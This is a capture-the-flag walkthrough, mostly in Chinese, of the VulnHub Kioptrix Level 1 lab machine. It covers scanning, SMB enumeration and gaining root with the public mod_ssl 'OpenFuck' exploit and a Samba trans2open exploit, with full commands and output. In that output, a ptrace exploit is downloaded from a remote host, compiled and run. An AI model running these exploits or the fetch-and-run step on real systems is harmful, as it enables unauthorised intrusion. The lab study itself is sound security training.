VulnHub – Kioptrix: Level 1 (#1) walkthrough

Kioptrix: Level 1 (#1) 介紹與載點
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

先利用nmap或是netdiscover, arp-scan偵測同網段的主機
三選一就可以

nmap -sP 192.168.112.0/24
netdiscover -r 192.168.112.0/24
arp-scan 192.168.112.0/24

掃描完的結果如下

root@hackercat:~# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 03:51 EST
Nmap scan report for 192.168.112.1
Host is up (0.00098s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00063s latency).
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 secondsCode language: PHP (php)
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 14 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 840
____________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname 
 ---------------------------------------------------
 192.168.112.1   00:50:56:c0:00:08     11     660  VMware, Inc.
 192.168.112.2   00:50:56:f7:2e:d5      1      60  VMware, Inc.
 192.168.112.252 00:0c:29:e1:8c:82      1      60  VMware, Inc.
 192.168.112.254 00:50:56:e0:3d:e8      1      60  VMware, Inc.Code language: JavaScript (javascript)
root@hackercat:~# arp-scan 192.168.112.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:87:73:e8, IPv4: 192.168.112.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.112.2	00:50:56:f7:2e:d5	VMware, Inc.
192.168.112.1	00:50:56:c0:00:08	VMware, Inc.
192.168.112.252	00:0c:29:e1:8c:82	VMware, Inc.
192.168.112.254	00:50:56:e0:3d:e8	VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.478 seconds (103.31 hosts/sec). 4 responded

so we know the Target IP is 192.168.112.252
then we need run port scan

Port Scan結果如下
we find
22 ssh
80 http
139 samba
443 https
111, 1024 rpc

default script netbios information
maybe can try this way

root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_allPortTCP.txt 
# Nmap 7.80 scan initiated Sun Feb  2 03:55:02 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for 192.168.112.252
Host is up (0.0041s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-02-02T09:58:05+00:00; +1h01m48s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Host script results:
|_clock-skew: 1h01m47s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1d>          Flags: <unique><active>
|_  MYGROUP<1e>          Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb  2 03:57:17 2020 -- 1 IP address (1 host up) scanned in 134.75 secondsCode language: HTML, XML (xml)
root@hackercat:~/vulnhub/kioptrix-level-1# cat 192.168.112.252_UDP.txt 
# Nmap 7.80 scan initiated Sun Feb  2 03:56:02 2020 as: nmap -v -sU -Pn -oN 192.168.112.252_UDP.txt 192.168.112.252
Increasing send delay for 192.168.112.252 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 192.168.112.252
Host is up (0.00087s latency).
Not shown: 996 closed ports
PORT     STATE         SERVICE
111/udp  open          rpcbind
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
1024/udp open|filtered unknown
MAC Address: 00:0C:29:E1:8C:82 (VMware)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Feb  2 04:14:08 2020 -- 1 IP address (1 host up) scanned in 1086.03 secondsCode language: PHP (php)

查看Web
80 port HTTP web and 443 port HTTPS have same web

use dirb 簡單的爆破一下路徑

dirb http://192.168.112.252 -o dirb_http.txtCode language: JavaScript (javascript)

看看netbios, smb有甚麼有趣的

nmblookup -A 192.168.112.252
nbtscan 192.168.112.252
smbmap -H 192.168.112.252
enum4linux -a 192.168.112.252Code language: CSS (css)

結果如下
nbtscan其實比較適合用整個網段偵查
譬如nbtscan 192.168.112.0/24
有發現似乎可以找到一些可能有用的資訊
可以嘗試用rpcclient連線看看
如果說可以用空的帳號密碼登入成功
在enum4linux掃描的時候就會有測試出來

root@hackercat:~/vulnhub/kioptrix-level-1# nmblookup -A 192.168.112.252
Looking up status of 192.168.112.252
	KIOPTRIX        <00> -         B <ACTIVE> 
	KIOPTRIX        <03> -         B <ACTIVE> 
	KIOPTRIX        <20> -         B <ACTIVE> 
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> 
	MYGROUP         <00> - <GROUP> B <ACTIVE> 
	MYGROUP         <1d> -         B <ACTIVE> 
	MYGROUP         <1e> - <GROUP> B <ACTIVE> 
	MAC Address = 00-00-00-00-00-00Code language: HTML, XML (xml)
root@hackercat:~/vulnhub/kioptrix-level-1# nbtscan 192.168.112.252
Doing NBT name scan for addresses from 192.168.112.252
IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.112.252  KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00Code language: HTML, XML (xml)
root@hackercat:~/vulnhub/kioptrix-level-1# smbmap -H 192.168.112.252
[+] Finding open SMB ports....Code language: PHP (php)
root@hackercat:~/vulnhub/kioptrix-level-1# enum4linux -a 192.168.112.252
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb  2 04:09:03 2020
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.112.252
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.112.252    |
 ======================================================= 
[+] Got domain/workgroup name: MYGROUP
 =============================================== 
|    Nbtstat Information for 192.168.112.252    |
 =============================================== 
Looking up status of 192.168.112.252
	KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
	KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
	KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	MYGROUP         <1d> -         B <ACTIVE>  Master Browser
	MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	MAC Address = 00-00-00-00-00-00
 ======================================== 
|    Session Check on 192.168.112.252    |
 ======================================== 
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.Code language: HTML, XML (xml)
rpcclient -U "" 192.168.112.252
或者是
rpcclient -U="root" 192.168.112.252Code language: JavaScript (javascript)

用searchsploit找一下有沒有相關服務的exploit

searchsploit openssh
searchsploit apache 1.3
searchsploit opensslCode language: CSS (css)

看起來apache mod_ssl <2.8.7 openssl的poc比較有可能有用

有兩個可以用
一個是764.c一個是47080.c

一開始先用764.c
後來覺得怪怪的
決定改用47080.c

那compile過程遇到error
打開47080.c來看

開頭註解有提到

需要安裝一下libary
apt install libssl-dev

然後編譯照它的語法

gcc -o OpenFuck 47080.c -lcryptoCode language: CSS (css)

完成後會多了一個OpenFuck檔案
執行一下看看會顯示甚麼

發現也很nice的提醒你usage

./OpenFuck 192.168.112.252 443 -c 45

發現我看錯用法了XD
用法是這樣

Usage: ./OpenFuck target box [port] [-c N]Code language: HTTP (http)

target不是要填入目標IP
target而是要填入下方supported offset清單中
目標相對應的版本
後面那個box才是填IP

我們前面port scan時已經知道
版本是
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
對照清單應該是… 好像很多個XD
隨便先選了0x5e 試了失敗

root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x5f 192.168.112.252 443 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
Good Bye!Code language: PHP (php)

利用grep找一下 發現事有1.3.20的

root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck | grep 1.3.20
	0x02 - Cobalt Sun 6.0 (apache-1.3.20)
	0x27 - FreeBSD (apache-1.3.20)
	0x28 - FreeBSD (apache-1.3.20)
	0x29 - FreeBSD (apache-1.3.20+2.8.4)
	0x2a - FreeBSD (apache-1.3.20_1)
	0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
	0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
	0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
	0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
	0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
	0x7e - Slackware Linux 8.0 (apache-1.3.20)
	0x86 - SuSE Linux 7.3 (apache-1.3.20)Code language: PHP (php)

也就6a跟6b兩個
就決定是你們了
試了一下6a failed
but 6b successed!

root@hackercat:~/vulnhub/kioptrix-level-1# ./OpenFuck 0x6b 192.168.112.252 443 -c 45
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--06:09:30--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
    0K ...                                                   100% @   1.87 MB/s
06:09:31 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]
gcc: file path prefix `/usr/bin' never used
[+] Attached to 6241
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
rootCode language: PHP (php)

這只是拿到root的其中一種方法

換個方法
一樣是用searchsploit
這是找看看samba的, 看有沒有在Linux下的Remote poc
因為大小寫關係 所以我用inux跟emote

searchsploit samba | grep inux | grep emote

決定試試看

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

一樣把poc複製到目錄下編譯執行看看
結果發現很不錯的還有介紹怎麼使用

root@hackercat:~/vulnhub/kioptrix-level-1# cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/vulnhub/kioptrix-level-1/
root@hackercat:~/vulnhub/kioptrix-level-1# ls
10.c  192.168.112.252_allPortTCP.txt  192.168.112.252_UDP.txt  19975.pl  47080.c  764.c  dirb_http.txt  OpenFuck
root@hackercat:~/vulnhub/kioptrix-level-1# gcc 10.c -o 10
root@hackercat:~/vulnhub/kioptrix-level-1# ./10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./10 [-bBcCdfprsStv] [host]
-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose modeCode language: PHP (php)

結果隨便試一下就成功XD

root@hackercat:~/vulnhub/kioptrix-level-1# ./10 -v -b 0 192.168.112.252
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
rootCode language: HTML, XML (xml)

後來才知道原來這裡面也會有flag
用find去找找看不同關鍵字

find / -iname *flag* 2>&1 | grep -v "Permission denied"Code language: JavaScript (javascript)

用flag去找 有看到一些看起來像是的東西
不過cat之後都怪怪的

結果我後來是用root這個關鍵字找到
在mail資料夾的下面

cat /var/spool/mail/root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
	by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
	for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...
From root  Sun Feb  2 04:45:16 2020
Return-Path: <root@kioptrix.level1>
Received: (from root@localhost)
	by kioptrix.level1 (8.11.6/8.11.6) id 0129jG501136
	for root; Sun, 2 Feb 2020 04:45:16 -0500
Date: Sun, 2 Feb 2020 04:45:16 -0500
From: root <root@kioptrix.level1>
Message-Id: <202002020945.0129jG501136@kioptrix.level1>
To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1Code language: HTML, XML (xml)

Tags:

發佈留言